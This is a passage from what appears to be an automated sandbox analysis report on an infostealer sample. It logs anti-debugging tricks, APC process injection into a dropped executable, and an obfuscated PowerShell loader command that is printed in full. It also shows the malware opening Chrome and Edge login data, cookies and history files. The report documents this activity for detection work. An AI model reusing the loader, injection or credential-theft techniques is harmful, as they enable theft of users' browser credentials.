          Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\jr
          Source: svchost.exe, 00000004.00000002.2252344812.000002527EE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251666504.0000025204455000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251618487.0000025204441000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-4165
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-4161
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00401C43 LdrInitializeThunk,LdrInitializeThunk,SendMessageTimeoutW,SendMessageW,FindWindowExW, 11_2_00401C43
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Nonalined.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Nonalined.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Nonalined.exe base: 16C0000
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_70A01096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree, 0_2_70A01096
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nonalined.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

Source: Yara match | File source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
